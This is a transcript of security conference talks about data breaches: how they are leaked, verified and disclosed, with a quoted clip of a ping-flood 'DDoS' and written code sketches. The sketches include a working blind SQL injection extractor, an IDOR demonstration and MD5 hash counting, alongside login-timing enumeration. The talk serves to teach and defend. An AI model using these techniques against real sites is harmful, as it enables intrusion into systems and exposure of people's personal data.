And then when it hits the media and it's all over the press and suddenly they go, holy shit, look what I've done, I think that's when it hits home. And they say, wow, this is actually real. So I almost feel a little bit sorry. I do feel a little bit sorry actually for a lot of these kids because they don't know what they're getting themselves into. They don't know what's the actual real world ramifications of what they're doing. Other ways data comes to me. Just a pretty good example. So this guy just here is saying he wants to know what his password is. And one of the curious things that I'm finding with data breaches now is that after a breach, the victims of the breach really want to know what their data was, what was exposed. And this is kind of natural, right? Like I have just had personal information exposed. Tell me what it is. So I want to know what it is. And I get heaps and heaps and heaps of emails like this. I end up having to write a blog post which basically says, no, I can't share data because I can't respond to individual requests, go through, try and find their data, then try and send it to them in a secure fashion because often it's passwords and things I don't want to be emailing. But this happens all the time. Now after I told him I couldn't share it, he was, you know, sad face, which I understand. But I would really like to see organizations making this available. And I'm talking about this more at the end as well. But to me, it seems to be their responsibility. You lose the data, you're responsible for telling people what you've lost. Not in one generic message, we're really, really sorry, we lost your things. But this is exactly what we lost. This was the name you had, the password you had, the credit card details that got exposed. It's public anyway, it's doing the rounds. The company should just tell them. It's another way data comes to me. So this was someone who sent me some data about a Dutch financial institution. 
And what I find interesting about this particular picture is the fact that it's a console window with SQL map. So the guy has basically sent me an email and said, hey, I've got some data you might be interested in. I'll show you the discussion we had after this in a moment. But basically what he's done is he's gone, like he's literally, he's hacked into it using SQL map, which is an automated tool, you can see part of the command line up there. You basically run SQL map, pass a -u switch with the URL that you want to hack. There's a few other parameters. You go outside and play. I shouldn't say that, but that's what they do. And you come back and it's got all the data out. It's really, really, really simple. So he's pulled all this information out of the system and then said, hey, here it is. And I said, okay, well, what I think you should do is you should disclose it privately to the company. You should let the company know that they have a vulnerability because you're at this point now where no one actually knows about it. You know, once you make it public, it's like there's no going back. Now it's public and you're going to get yourself into a lot more hot water as well. So I said, disclose it privately. And he said, what's private disclosure? Like it just never crossed his mind that maybe he should get in touch with them and say, hey, you've got a vulnerability. And even after I said that, he's like, okay, well, do you still want the data? No, go to your room, think about what you've done. Don't do it again. This is often the way with the kids, right? They're not thinking about the real world ramifications. So ultimately I said, okay, I'm not going to go and take this data. I'm not going to publish it. You need to get in touch with them privately. And in fact, what happened in this case is I got in touch with some Dutch security people I know, let them know, they got in touch with the organization that was impacted.
There was a small amount of news on it, but basically the data never went public. I hope they actually let their customers know because it is their customers on the previous screen. But the whole thing ended up being a lot quieter than what it could have been otherwise. There's another good example of where I get data from. So this is a public website. It's on the clear web. This is not a Tor hidden service. You can just type in the URL, go here and start downloading data breaches. It's that simple. This data is floating around the web everywhere. This is just one site of many that are on the clear web. There are many more on Tor hidden services. And it's not even entirely clear why they run this. I mean, he's asking for Bitcoin donations. Maybe he gets a few Bitcoin thrown at him every now and then. But it goes on and on and on. There's about 25 records per page and there's about nine pages as well. So maybe a couple of hundred different data breaches just sitting here publicly searchable, publicly downloadable. And this is what some of them do. So another way I find data breaches. Often we'll see information leaked on Pastebin. Pastebin is a really popular means of leaking info because it's very, very easy just to go and create a paste, put whatever you want in it. It's anonymous. There's no authentication. There's no sign up. And then you share the URL. And Pastebin in their terms and conditions say you shouldn't be sharing data breaches or things like this. I don't think they're quite as explicit as, like, you shouldn't be sharing other people's sensitive information. But I don't think they mean it because it happens all the time. And they probably make the argument of, look, it's just a service. People can use it for good. They can use it for bad. But this sort of stuff happens a lot. And what we often see is stuff like this where this guy's going, okay, here is part one of the triple-O web host data breach. So people recycling the data breaches now.
Go and get the full thing at triple-O web host dash leak dot blogspot dot com. So you can get the whole thing. So you go to get the whole thing and you end up somewhere like this. And then it goes, okay, there's part one and part two. Download this one first. Go over here. So you go there and you got to fill out a survey, right? So now we're starting to see the monetization because all of this sort of crap earns people fractions of a cent every time people go through into the survey. So you go, okay, I'll download. All right, so now I got to do this. I got to go back. I got to do another survey. And then it takes you to here. And now I got to do another survey so that I can get a gift card for $100. Guess what? You don't get a gift card for $100. And normally I get about to here and I go, screw it. Like you guys are just trying to make money out of it. So again, it's the monetization thing. They're trying to trick people into going through and filling this stuff out with the promise of getting breached data. Just all the different ways this data is recycled and reused are kind of fascinating. Now this is another problem that I often have, which is that data is leaked and someone says, here it is. It is, for example, the triple-O web host data breach. We want you to publish this data. It's serious. We hacked it. And I've got to try and figure out if it's legitimate or not. Because a lot of the time when I see this data, it's not legitimate. And there's a few different ways I can do this. So I can do things like Google some of the hashes. And if I find that the hashes in the data breach appear in many different other places under the names of other data breaches, well, it's probably not going to be real. But there's a few different ways that I do verification. So here's one good way. Now this is actually Ashley Madison again.
So again, back in July, when we first heard they'd been hacked, but the data hadn't been leaked, one of the things I found quite fascinating about actually Madison is everyone got really, really upset, assuming everyone who was in the data breach got upset when that news came out. They said, oh, no, now people can discover that I was on the site. I thought, well, this is curious. I wonder if you can discover if they're on the site anyway. So I went to the password reset page and I said, OK, well, I'm going to put in an invalid email address and let's see what happens. Came up and said this. And when I saw this, I thought, OK, this is pretty good because if we look at the piece in bold, it says if that email address exists in our database, you receive an email to that address. And I thought, OK, that's good because it's non-committal, right? It's not saying, yes, you had an email and we've just let you know as opposed to no, you don't have one. Adult friend finder, by the way, who was breached in May, four million records, they still do that today. You can go to adult friend finder, put in an email address and it will tell you explicitly whether it exists or not exists. So they leak the presence of every person on that site via an enumeration risk. And curiously, just a little tip, if you are going to sign up to one of these sites, don't use your normal email address. Don't use your working email address. Make something up. Do not use your dot gov address. There are a lot of dot gov addresses in these things. And you could say that someone else signed you up until your payment records are leaked as well. And then it's really, really hard to make that argument. So this is what they're doing. They're going, OK, if you had an email address we're going to, or if you had an email in the system, we're going to send it to you. Sounds good. Now, this was invalid. Let's have a look at the message when you did have an email address in the system. You see any difference there? 
It's not subtle, is it? So I wrote about this and I said, look, you can find out anyway that way. Why are you getting all upset? I mean, I know why you're getting upset, but you could always do this anyway. So Ashley Madison actually fixed it and I thought, that sounds like a challenge. I wonder if there is another way of finding out whether accounts actually exist on the site or not. So I went over and I did this. I thought, what I'll do is I'll log on 25 times, but what I'll do is I will use a valid account for research purposes. Number of times I said that to my wife. She's walked in. What are you doing? Research. I do a lot of research. Anyway, so I tried to log in 25 times, valid email address, invalid password, and I timed it. OK? Looks like this. It's a reasonable spread. This is how long the HTTP response takes between issuing the request and getting a response back. Login fails. Fine, because it's an invalid password. Around about 500 to 600 milliseconds. So then I said, OK, what happens if I take an account that does not exist on the system and I try and log in with that? That's curious, isn't it? Anyone know why that is? Any guesses? Doesn't hash the passwords. Right. So here's how it works. Actually, often when I ask that, some people say, well, yes, because it's doing a database lookup. If your database lookup for an account takes 500 milliseconds, you have a different problem. It shouldn't be taking that long. So here's what happens, right? Ashley Madison used bcrypt with a work factor of 12. They screwed it up really, really badly, and we later found we could get basically 90% plus of the passwords out anyway. However, they were using bcrypt work factor 12, so a fairly heavy workload in the hashing. And what happens is when you provide a valid email address, regardless of whether the password is valid or not, valid email address, it goes to the database and it says, get me the record for this person.
The record comes back with the salt and the salted hash, and then the supplied password gets combined with the salt and everything gets hashed. And because it was a high work factor algorithm, it took several hundred milliseconds. When the account doesn't exist, the application goes to the database and says, get me the account for this email address. The database comes back with nothing, and the app says, well, now I don't have to hash. So this, from an efficiency perspective, is really good. But from a disclosure perspective, we have this. So things like enumeration risks are one way that I verify data breaches. And if I can pick three random email addresses from a data breach, plug them into the password reset, and it confirms whether the account exists or not, I've got a really high degree of confidence that that data is legitimate. Now three people are going to get password reset emails, three people out of a breach, in this case, of 30 million. I'm not feeling too bad about that because now they've got bigger problems. Now they've had all of their data leaked publicly. And it's taken me three emails to figure that out and then let potentially millions of people know what's happened. Because millions of people do find out, whether they find out by notifications on my Have I Been Pwned service or whether they watch the news. You could not miss the news on Ashley Madison. Here's another good one. So this is Stratfor. Stratfor was an intelligence company. They did reports, particularly for governments, on things like the political landscape of certain countries. And they got hacked in 2011, and they had all of their data leaked. They went kind of offline for a little bit. And they had to sort of send this message and say, look, we were hacked by an unauthorized party. Everything got suspended for a while. I want to show you what that data breach looks like and a really easy way of verifying that. So again, this is a data breach that did get circulated pretty broadly.
Looks like this. It's a pretty sort of typical structure here. It's just comma delimited. User IDs, names, passwords, emails. These are the passwords. They're all MD5 hashes. Just straight MD5 hashes. No encryption. No salt. Nothing else. Just very, very simple. So the way I'd verify something like this is I'd search for hashes. And I thought, well, maybe one of the ways we can do this is I'll make it interesting and I will search for a .gov. Find someone with the .gov address and I'll take their hash. And then I'll go to Google. And Google is really good at cracking hashes, because you can search for a hash when it's not salted. The salt adds randomness that should be unique for every record. But when it's just a straight hash, you can go and search on Google and you can often find the plain text version. So this was the Stratfor data breach. And that was one of the hashes. First government official's hash. Now what do you reckon the password was? Stratfor. Who would do that? Who would sign up on a website called Stratfor and use the password stratfor? But see, this is verification for me. OK, this hash was a password which is likely to be used by those people. Now what I could then do is I could turn my zoomer on because you're going to need to see this one closely. One of the things I found curious is I thought, OK, well then how many people might have actually used that same password? Because once we're actually talking about a case where it's just a straight hash and there's no salt, we can do this. We can go back into here. We can do a find and we can do a count for that hash. How many hashes do you reckon we're going to find? We get 12,000 people. There are 860,000 records in the breach, and 12,000 people used the password stratfor on the website Stratfor. Now that's stratfor, all lower case, because if it was Stratfor with a capital S, the hash would be completely different. So we'd inevitably find a whole bunch of people did that as well.
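That counting trick is easy to reproduce. This is a minimal sketch with made-up records, not the actual Stratfor data: because unsalted MD5 maps identical passwords to identical hashes, a simple frequency count over the hash column reveals password reuse, and a change of case produces a completely different hash.

```python
import hashlib
from collections import Counter


def md5_hex(password):
    # Plain unsalted MD5, exactly the scheme in the breach described above.
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Illustrative records in the same comma-delimited shape:
# (user id, name, password hash, email). All values here are invented.
records = [
    ("1", "alice", md5_hex("stratfor"), "alice@example.gov"),
    ("2", "bob", md5_hex("stratfor"), "bob@example.com"),
    ("3", "carol", md5_hex("Stratfor"), "carol@example.com"),
    ("4", "dave", md5_hex("hunter2"), "dave@example.com"),
]

# No salt means everyone who chose "stratfor" shares one hash, so a
# frequency count over the hash column exposes password reuse directly.
counts = Counter(row[2] for row in records)
print(counts[md5_hex("stratfor")])  # 2, alice and bob share the hash
print(counts[md5_hex("Stratfor")])  # 1, the capital S gives a different hash
```

The same idea scales to the real breach: one `Counter` pass over 860,000 rows is all the "find and count" in the talk amounts to.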
So again, going back to the point of this, from a verification perspective, these are the sorts of ways I try and figure out is this data breach legitimate or is it fabricated? The other thing I started doing recently is this, because what I've realized is I have got a really good repository now of people that are interested in the Have I Been Pwned service. So I've got a little notification service. You can sign up for free, you put your email address in, you get an email, it says you've signed up for notifications. Are you sure you want notifications? And you click a link to say yes, so it verifies you and it's done. I've got about 330,000 people that have signed up for this. So what happens now is when I have a new data breach that I can't verify using the means I just showed you is I start emailing subscribers. So good example, VTech. VTech is a Hong Kong based toy maker. In the October, November period, a reporter emailed me, a reporter I'd worked with before, and he said, I've been given a data breach. I want you to help me verify it. So I got the data breach and I couldn't find anywhere on their website to go through and do like a password reset. There was nothing in the data breach that would allow me to do stuff like easily Googling hashes, they were salted hashes. And what VTech actually did is they made tablets for kids. So think about like an iPad but it's all plastic and colourful and things like that. And you could give it to your kid and then the kid's mate could have one as well and then they could chat via the magic of the internet. So a lot of parents didn't realise these kids are chatting in different houses. It goes via the internet. You just put your kid's details on the internet. And this is what was in the data breach. Four million adults with names, email addresses, physical addresses, phone numbers, 280,000 kids with name, gender, age, average age of five years old, and a foreign key to the parent's record.
So if you had this data you could basically decide what child would I like in a convenient location and find them. I didn't get the photos, but the attacker later also gave the reporter photos because the tablets had a camera. Kids take their photo. There's photos of kids, 280,000 of them. Later on after this all blew up, VTech said it wasn't 280,000 kids, it was six million. Shit. That was a lot. But anyway, verification. Because you signed up via a tablet and the tablet talked to an API, I couldn't see an easily accessible interface anywhere where I could check things like password resets. So I did this. I took the email addresses from the data breach and I found the most recent 20 subscribers to Have I Been Pwned. So people that were thinking about the service recently. And I sent them this email and I didn't tell them what the service was or where it was. I just said, hey, look, would you help verify this? And I had about half the people respond and I'd get messages back like this. In fact, this is what I sent to the person. So one person came back and said, yes, I would like to know what the incident was. So I would send them a piece of information or three pieces of information which would give them a degree of confidence that it was their data without being too sensitive. So when did you first log in? That's not too bad. Where were you located? And your ISP, from the IP address. This poor lady was in TalkTalk and VTech. She was really impressed when she emailed back. But, you know, like this is not sensitive data, but it's enough to have a pretty high degree of confidence whether it's legitimate or not. And she came back and said, yes, that's accurate. And that gives me a high degree of confidence for one person. And then I had about six actually come back and ultimately verify their data. So what I'm finding is that Have I Been Pwned becomes a really, really good verification channel.
I actually get feedback from the individuals in the data breach before I make anything public that, yes, it was actually legitimate. So that's been really useful. This is also really interesting. The way the organizations respond when these incidents happen. And you probably see, if you read the news, a really broad range of responses. But a lot of them are kind of like this. This is the first thing a lot of companies say, don't worry about your credit card. Now put this in context. Ashley Madison, a site designed for you to have affairs. If your wife finds out, she might leave you. You may never see your children again. Like really, really bad things are going to happen, life changing things. But don't worry, your credit card's fine. Same here. This is VTech. Your children have been leaked. People know where to find them. They know what they look like. They know their names. Don't worry, credit cards are all right. What are you worried about? And inevitably what we're doing here is we're trying to placate PCI. These organizations are worried that they're not going to be able to process credit card payments anymore. Their first concern is keeping the payment card industry happy, which is just really bad. It's just something that absolutely stinks about this. So we often see these really evasive sort of messages focusing on things that ultimately are in the company's best interest. I've got many, many examples. I wrote a blog post a while ago where I showed this. Initial responses focus on credit card data. Who's had their credit card defrauded before? Wow. You guys are lucky. There's only a few of you. I wrote something where I talked about this and I said, look, who really cares about the credit card? Because if it gets compromised, your bank gives you fraud protection. They give you the money back. The next week, and I'm sure it was coincidental, but the next week my wife's card was defrauded. We found out on a Monday morning and went into the bank.
The bank canceled the card. We had the money back in the account by the end of the day. We had a new card in the mail at the end of the week. The greatest inconvenience of the whole episode was that we had to change some of our direct debits, which were trying to debit the old card number. That's what credit card theft means today. A bit different for debit cards, but credit cards, for me, as a consumer, it's kind of a non-event. This was a really good response. So Patreon, who I mentioned got hacked earlier on, Patreon did a number of things really well. So they did things like they stored all their passwords in bcrypt with a work factor of 12. They did something else that I have never seen any other company do in a data breach, which is that they encrypted the personal identifiable info. They encrypted addresses. They encrypted other aspects of your personal info that other companies never do. Not only did they encrypt it, but they managed not to lose the private key when they did get hacked, because that's the other trick, right? You can encrypt. It's no good if your key gets disclosed. So they actually got it right. Why I like this message: it came from the CEO. What I like down here at the end of the third line, I am so sorry to our creators. He's actually apologetic. A lot of companies, the first thing they do is go, evil cyber hackers. These evil cyber hackers, it's illegal. They rant and they rave and they get angry at the people that breach them without focusing on the fact that they screwed up. And yes, they are evil cyber hackers and they should have legal recourse. They probably should end up in court if not jail, but those companies, companies like Avid Life Media that created Ashley Madison, VTech, really, really screwed up. VTech in particular did terrible things with their app design. It took me about 10 minutes to find out that I could create two accounts, log into one and pull the data out of all the other ones. Took me 15 minutes.
You know, and I'm not doing anything special. I just see there's an HTTP request. It has a number in it. I wonder if I add one. Could I get some different data back? Yes, there you go. Job done. So, this from Patreon. Patreon also said this, they went on to say we don't store credit cards. All right, they have to keep PCI happy, but they also actually give some detail, encrypted with a 2048 bit RSA key, no specific action required, and then they go on and they give technical details. So there's transparency. And finally again from the CEO, another apology. I sincerely apologize for this breach. Like this, I think, is about as good as you can do with the breach message. And they did screw up. They had debug settings in a publicly facing environment that had access to production data. They screwed up. They admitted it. They gave the details. From that we saw that they did those other things well. They did the bcrypt well. They did the encryption well. They had a good message. These things happen, but this organization was prepared for it and they responded in the right way. The other interesting thing that comes up is people often say a company gets hacked, but then they get over it and they move on and there's no sort of long lasting impact. It's not like their share price dives or anything like that. And I find that curious for a couple of reasons. Number one is that data breaches are expensive. Very often data breaches lead to having to do things like provide identity theft protection for everyone. It's a very standard response. Oh, we got hacked. Identity theft protection. There we go. And that happens. It ties up a lot of resources. It damages brand. It keeps services offline. VTech had to take all their services offline after this incident happened. I was in London last week and I went into Hamleys, the big toy store, and there's a massive VTech stand. I was like, I'm going to go and ask them about how secure these things are.
And they didn't have any of the tablets in stock. And it wouldn't surprise me if they were just not able to sell them at the moment because the service is still offline. Like their service, it's like a ground up rebuild. So it does have impact. And I wanted to find some examples of where it actually has real impact. So I looked at things like this. Now this one is curious. This was a few months ago. Again someone sent me some data. They contacted me via Skype and said, I've got some data breaches, but I didn't compromise them, I've had them through sort of trading with other people. And I believed the guy because we had quite a long chat after that. And one was called Neteller. Neteller, not like Nutella, the thing you put on your toast. And the other one was called Moneybookers. And these were gambling sites. And the data dated back, I think, to about 2012, like it was quite old data. And the interesting thing here was that those two organisations had been bought by another company, and this other company was now responsible for it. So, a listed company. And the interesting thing is that we ended up sort of getting in touch with the company. They responded really, really well. I had quite a few chats with their security guys trying to figure out what was going on. The company's called PaySafe. And PaySafe, because they're listed, they have to disclose this sort of stuff. Like they can't hide it. They've actually got to take it seriously. So they had to put out a press release about it. And then this happened with their share price. Now there's two curious things here. So number one is that if you look at it on the aggregate, nothing happened. Number two is they did lose 300 million pounds there. 300 million pounds, just for a moment. That's a lot of money. 300 million pounds. They dipped in direct response to that incident. 300 million pounds. That's like 20% of their share price.
If you had prior knowledge of this before it hit the news and you wanted to play the market, okay, it would probably be a little bit obvious if you don't normally play the share market and you suddenly had all these options out on something just before it dropped 20%. But that did have a serious ramification. And I wanted to show this because it shows that even though there might not be a lasting impact, that's a lot of money. 300 million pounds. Another good example. This was a few years ago. Associated Press had their Twitter account hacked. Let's just be clear about the news here. It wasn't Twitter being hacked. It was AP having a shitty password or getting phished. It was one of those two things, always is. This is what the tweet said when they got compromised. This did upset the market. The market responded and the market did this. That is some number of billions of dollars on the Dow Jones. And again, on aggregate, like it all evened out, it was all good. But holy shit, look at that. That's just a massive amount of money. So it does have an impact. It might not be a lasting impact, but it does have an impact. Out of that, many people would have lost a lot of money. Many people would have made a lot of money. This is the other thing that got a little bit interesting last year. I had a phone call from a very nice American man. And it was curious. In fact, it started with an email. So I got an email, the FBI would like to talk to you about one of the data breaches. And I said, okay, fine. We'll have a chat. And they sort of wanted more information on the background about what was in there, what I had found in investigating it. It also led to discussions with the Australian Federal Police, who are also very nice. All of them are always very nice. I hope they stay nice. But when I thought about it, there are a few interesting things here.
And one of them is that often the likes of the FBI, the NSA, et cetera, are perceived as being evil. Evil in the respect of, particularly for those who are in the security industry, we see a lot of news and things about how they're cracking down on people doing ethical things, disclosing vulnerabilities, how they're basically out there to do things that invade our privacy. And when I thought about it more, you know, one of the things about the likes of the FBI, Federal Police, any sort of government security or intelligence agencies is that we do want them. We want them stopping a lot of the sort of stuff we've seen. I don't want things like triple-O web host being hacked into and leaked all over the place. I want them to catch the people that did that. I'm not going to disclose who I've been talking to or violate private discussions, but I want them to make sure these things don't happen. We need these guys. And I guess it's like everyday police on the street. We want them there to keep us safe. They play a really valuable role. And it's curious when you look back at where there's been involvement that involved security people and the press has taken it really badly, it's interesting to look at the details. So for example, everyone remember this? This guy, weev, if you ever follow him on Twitter, he's, let's just say he's an interesting character and leave it there. But he identified a vulnerability with AT&T where he could pass an identifier from his iPad into one of their services and get back information about the account holder. And the news here is sort of going, security researcher found guilty of conspiracy and, you know, I'll get out of this, I'll be okay. You know, it was a real sort of beat up job. But the detail of it was that basically he found a direct object reference risk. He could pass an ID, get a record back out. And then just to make sure it wasn't an accident, he did it another 114,000 times and then gave it to the press. That shouldn't happen.
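A direct object reference risk of the kind weev found boils down to a lookup keyed only on an ID the client supplies. This is a hypothetical sketch with an in-memory store, not AT&T's actual service, contrasting the vulnerable lookup with one that also checks ownership:

```python
# Hypothetical in-memory account store standing in for the real backend;
# the point is the authorisation check, not the storage.
ACCOUNTS = {
    1001: {"owner": "alice", "email": "alice@example.com"},
    1002: {"owner": "bob", "email": "bob@example.com"},
}


def get_account_vulnerable(account_id):
    # Classic insecure direct object reference: whatever ID arrives in
    # the request gets looked up and returned. Add one to your own ID
    # and you get someone else's record.
    return ACCOUNTS.get(account_id)


def get_account_fixed(requesting_user, account_id):
    # The fix: verify the authenticated user actually owns the record
    # before returning anything.
    record = ACCOUNTS.get(account_id)
    if record is None or record["owner"] != requesting_user:
        return None
    return record


# Alice enumerates: her ID plus one yields Bob's record on the
# vulnerable lookup, and nothing on the fixed one.
print(get_account_vulnerable(1002))      # Bob's record leaks
print(get_account_fixed("alice", 1002))  # None
```

Run that enumeration in a loop 114,000 times and you have exactly the pattern described here: one missing ownership check, every record in the system exposed.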
It's the same here. He's an Aussie guy. It happened with Australia's First State superannuation, like our retirement plans. He found a vulnerability, a direct object reference vulnerability. Found the risk, then just to make sure, did it another 770,000 times, got all the data out and then wondered why the police knocked on his door. Police took away all his toys for a while. As it turns out, it worked out really badly for First State Super because basically it showed that they had really gaping security holes, and they were in negotiations, so it cost them a lot of money. But often when we see headlines like this, there's another story behind it. And we want the FBI, the Australian Federal Police, everyone else who's playing those sorts of roles, we want them there to try and keep us safe from these sorts of incidents. So it leads me to here. Three things that I would really like to see change with the way data breaches are handled and the way organisations respond. So number one is this. A while ago, it must be about two years ago now, Forbes got hacked. Forbes had about a million records leaked. It took them a week to let anyone know. It took me less than 24 hours to let every subscriber to Have I Been Pwned know. This should be an easy thing. You get hacked, you've got to let people know quickly. Because otherwise you get all this speculation in the media, people are going, well, I don't know what's going on. Like, are my details compromised? Do I need to go and get identity theft protection? Is that funny credit card transaction a result of this? Like this should just be fundamental. This is the other one and I reckon this is actually really important. And it goes back to that earlier point of people starting to ask me for their data. The organisation is the one that lost it. If I'm able to obtain this data because it's been spread out all over the internet, then surely they can obtain it and surely they can give it to their customers in a secure fashion.
This should be fundamental, and I'd really, really like to see organisations doing this, and I'm not aware of any that have done it in the wake of a data breach. And finally this one. I just can't see this data breach environment changing until there's enough incentivisation for organisations not to let it happen. The primary penalty that organisations face at the moment is the risk of sanctions from PCI. And that's why we saw those messages about payment cards. They don't want to lose the ability to process payments, and they're scared of getting fines, and that causes them to respond in a different way. We need to see government penalties, and it's going to be really interesting to see now with this news about the EU potentially fining organisations up to, is it 4% of their annual revenue? Potentially up to 4% of your annual revenue if you have a data breach. Now it's early days, we've got to see how that actually works, but that is an incentive not to get compromised in the first place, and certainly to take it seriously if you do. Because what gets me is when we look at some of these recent breaches, things like VTech. Now VTech was only a couple of months ago, and it had SQL injection. I'm pretty sure it had SQL injection because when you logged on and you looked at the response that came back, the JSON response included the SQL statement that was executed along with the data. I just have no idea why you'd do that. Maybe someone was debugging and they thought, you know, it would be helpful. Let's see the whole thing. They definitely had direct object reference risks. They had no transport layer security. They had all sorts of other serious issues. They should get slapped with a fine. I don't know what jurisdiction it happens in. They're a Hong Kong based company. They sell all over the world. But they should get hit with something.
Because how can a CIO or CTO today sit there and not be aware of the likes of TalkTalk and Ashley Madison, all these things? They know. And at no point have they said, maybe we should get someone who knows what they're doing to look at our app. They definitely haven't done that, because it would have taken anyone about five minutes to find the risks. So I don't know how this works, but I think until they get penalties, we're not going to see a lot change. All right. So that brings me to the end. And that is our first talk. That is the Slido info. So you guys can post questions and things. Does anyone want to ask a question right now, while we're here? Topical? Or you can put it in the Slido. We can talk about it later. Yes? So sqlmap is actually really powerful. I'll show you a quick overview, because this is something that we're doing this week in one of my workshops as well. But if we go to sqlmap.org and you have a look at all the stuff it can do, it's actually really, really extensive. The documentation, to be honest, is terrible, but it just goes on and on and on and on. And what you can do in its most basic form is point it at a URL and let it discover the type of database and then what the risk might be. You can also do things like get it to run Google searches and then attack the results. You can get it to extract just the schema. It will do error-based SQL injection, union-based SQL injection, blind boolean SQL injection, blind time-based SQL injection. It will do all these different styles of attack. And for people that actually know how to use this and can use it properly in anger, it's enormously powerful. But what we often see, and I'm going to give you a demo of this in my next talk, is kids running Google dorks, so Google searches crafted to find very specific things, copying the results, pasting them into sqlmap. Do we get data? Yes. Well, now we'll leak it, and then we'll make up a reason why they deserved it.
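What sqlmap's blind boolean mode automates can be sketched against a local, throwaway SQLite database (no real target involved): ask the vulnerable query a series of true/false questions and binary-search each character of the secret. The schema and data here are invented for illustration:

```python
import sqlite3

# A deliberately vulnerable query against an in-memory SQLite database,
# illustrating the boolean-based blind technique sqlmap automates.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, password TEXT)")
db.execute("INSERT INTO users VALUES (1, 'secret')")

def vulnerable_lookup(user_supplied_id):
    # String concatenation: the classic injection mistake. Returns only
    # True/False, which is all a blind attack needs.
    sql = "SELECT count(*) FROM users WHERE id = " + user_supplied_id
    return db.execute(sql).fetchone()[0] > 0

def extract_char(position):
    # Binary-search one character of the password using only yes/no answers.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        probe = f"1 AND unicode(substr(password, {position}, 1)) > {mid}"
        if vulnerable_lookup(probe):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

recovered = "".join(extract_char(i) for i in range(1, 7))
```

About seven queries per character recovers the whole value, which is why automated tools make this trivial even for someone who doesn't understand the mechanics.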
There'll be a reason. I'll give you an example of that later. And if they don't find anything, then they'll just move on to the next one. So the tools are very good at automating the process. The kids that are using them have got absolutely no idea how SQL injection works. All they know is they copy a URL, they paste it into the tool, they get data out. Yes. Good question. So I showed Trustify, which was making money out of the fact data was stolen. And you're asking, would they get into any legal trouble? One of the things Trustify did is they had a Reddit thread. And in the Reddit thread, they said, the reason we're not getting shut down is that we've got more lawyers than employees. True story. They then went through and they deleted all of their comments. But that was one of the comments. And in fact, it's in my blog post where I explained this is why they're probably not getting shut down. So basically, they were just fighting off DMCA takedown requests. And this is one of the other curious things that's happening now. We're seeing the Digital Millennium Copyright Act, which is meant to stop copyrighted material from being distributed, used to try and take down publicised data breaches. I don't think it's ever actually been tested in court, but it's enough of a scare tactic that a lot of people do just take the data down. But in the case of Trustify, they just fought it with lawyers and said, no, we're not going to do it. Lawyers. Yes. So, I guess the question is at what point should you disclose a vulnerability? Like how far do you need to go to establish it? The argument from the likes of the two guys I showed is that they need to get data out of the system, and they need to get volumes, in order for the company to take it seriously. But the thing is, once you change an ID and you get someone else's data, and let's just ignore how you did that or why you did that.
But for whatever reason, you mistyped the URL, for example, and you got someone else's record. That's the point where you contact the company privately and you say, a funny thing happened today while I was browsing the web. Because that alone demonstrates the risk. All that sucking the rest of the data out did was add impact, no doubt about that, but then they ended up in a huge amount of trouble. Even things like SQL injection: yes, it is a really impactful thing to give the organisation the data that you've exfiltrated from the system, but that's going to make it really, really hard for you to stay on the ethical side of the disclosure. So for me, as soon as I find that there is a risk, and again, you've got to be careful about how you discover it as well, because a lot of things like SQL injection take constant probing in order to find the risk. So you might find something and disclose it, but if you've found it by hammering away at their system in an unauthorised fashion, then that could be a problem. This is also another reason to have bug bounties. I really like the idea of bug bounties, and I really like the idea of services like Bugcrowd. And what these guys do is they run bug bounties for organisations. So you can say, I'm an organisation, and I would like it if, when someone finds a vulnerability, instead of dumping all the data publicly, they send me an email and we fix it privately. And maybe we give them a thousand bucks for it. A thousand bucks isn't much compared to the cost of public disclosure. So this sort of thing allows people to find vulnerabilities and report them to you, because they're incentivised to do it. So I really love this idea as well. Any other questions? All right, so I think we're running just a little bit over, but what do we do, Jacob? Do we have a break? Okay, and 15 minutes? Awesome. Okay, thanks everyone. Thanks everyone.
We can learn a huge amount about security by reviewing the failures of those who have come before us. In maintaining the data breach notification service "Have I been pwned?", I've dealt with literally hundreds of millions of breached records over time and have seen some fascinating things. In this talk we'll look at the patterns organisations who suffered data breaches were using, the types of data that were exposed and the things they could have done to protect themselves from malicious actors.
10.5446/50534 (DOI)
I'm not responsible for anything you do with the information I've provided in this video for you. So if you're going to do that with this information which I've given you, I'm not responsible for anything you do with the information I've provided in this video. So yeah, now that I've got that out of the way, let's get started. So what we've got to do is we've got to load up command prompt. I like my colour green. Then what we want to do is we want to type ping, and then I've got a bunch of random IPs here. So ping and then just paste it in, or you can type it out, hyphen t, hyphen l, and then the amount of packets. So this is the command, it pings them, and this is the IP it will ping. This is how long you want it to do it for. So I've put a limited timer. This is how many packets you want to send right here. So let's just hit that, and as you can see it's already begun the process of DDoSing the IP. Now there's one thing I'd just like to say: when you do this, sometimes it will come up with a timeout message. This means that the IP could be wrong, or in fact your connection is not strong enough to send packets, or it could just be a general error, because it could do all of this and then just say timeout and then carry on. So it could just be the pings that I actually sent. So once you're done, you hit Control-C, and we sent 43 packets, they received 43 packets, they lost nothing on their computer, so it's a 0% loss. So basically they must have a strong connection. You've got to do this for a while with this method. So go outside and play while you DDoS them. I don't know. But yeah. How do you like that? That's awesome, isn't it? Did you know you could do that? I like the bit where he says just go outside and play while you're DDoSing them. It gives you a bit of a sense of how sophisticated our adversaries are. So yeah, often this is kids, right? And we spoke a little bit about kids in the last talk. And recently we saw this as well.
So we had the Paris attacks, and Anonymous said, we're going to declare war on ISIS. We're going to take down ISIS. And this was posted on Facebook. And I saw the most epic comment ever left about Anonymous coming after ISIS. All right. So here's how this session is going to work. I'm going to just show lots of different things that are not in any one deck or any one process. I'm going to sort of pick things that I've been showing recently that I think are interesting. And we're going to do a lot of hands-on stuff as well. So it's meant to be sort of very practical. And basically I'm just going to keep going until I run out of time. And then we have to have a break. So I want to show you a few different things around security. I want to try and make it pretty practical as well. And one thing I thought we might start with is we talk a lot about HTTPS, and how do we do HTTPS right? And this is the thing with HTTPS. It's not like you either have it or you don't. There are lots of different levels of getting it right. Lots of different levels of screwing it up. And I want to give you an example. Here's one that really, really bugs me. And it's from an Aussie site. I'm going to start by insulting the Aussies. So when I go to Qantas, we get this nice scene. But when I go to Qantas over HTTPS, watch what happens up in the address bar. You've got to watch it carefully. Let's try reloading that. Watch it this time. You see what happened? I'll show you again. Just watch carefully right here. It goes green, and it's like there's hope, it's secure. And then they take it away. It disappears again straight away. So anyone know why this happens? Yes. Oh, no, not you. Anyone else? Anyone who's not Niall? So what's happening here is 